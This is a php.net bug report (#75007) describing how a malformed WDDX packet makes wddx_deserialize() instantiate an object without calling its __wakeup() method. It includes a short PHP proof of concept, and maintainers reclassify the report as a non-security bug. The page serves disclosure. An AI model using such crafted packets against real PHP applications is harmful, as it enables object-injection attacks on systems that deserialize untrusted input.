php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #75007 Create an Unexpected Object in During WDDX Deserialization
Submitted: 2017-07-30 14:34 UTC Modified: 2017-08-02 17:23 UTC
Votes:2
Avg. Score:4.0 ± 1.0
Reproduced:0 of 1 (0.0%)
From: taoguangchen at icloud dot com Assigned:
Status: Open Package: WDDX related
PHP Version: 5.6.31 OS: *
Private report: No CVE-ID: None
Have you experienced this issue?
Rate the importance of this bug to you:

 [2017-07-30 14:34 UTC] taoguangchen at icloud dot com
Description:
------------
Create an Unexpected Object in During WDDX Deserialization

In During WDDX Deserialization, an unexpected object can be created via the crafted wddx pockets, and bypass __wakeup() method

PoC:
```
class obj {
	function __wakeup() {
		var_dump('hi');
	}
}

$wddx = <<<EOT
<?xml version='1.0'?>
<wddxPacket version='1.0'>
<header/>
	<data>
		<struct>
			<var name='php_class_name'>
				<string>obj</string>
			</var>
			<var name='prop'>
				<string>ryat</string>
			</var>
EOT;

var_dump(wddx_deserialize($wddx));
```


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-07-31 12:46 UTC] zeev@php.net
Like unserialize, wddx_deserialize() must not be fed with untrusted input.
Consequently we don't consider bugs in wddx_deserialize security vulnerabilities.
Removing Private flag...
 [2017-08-02 17:23 UTC] cmb@php.net
-Type: Security +Type: Bug
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sun Nov 19 01:31:42 2017 UTC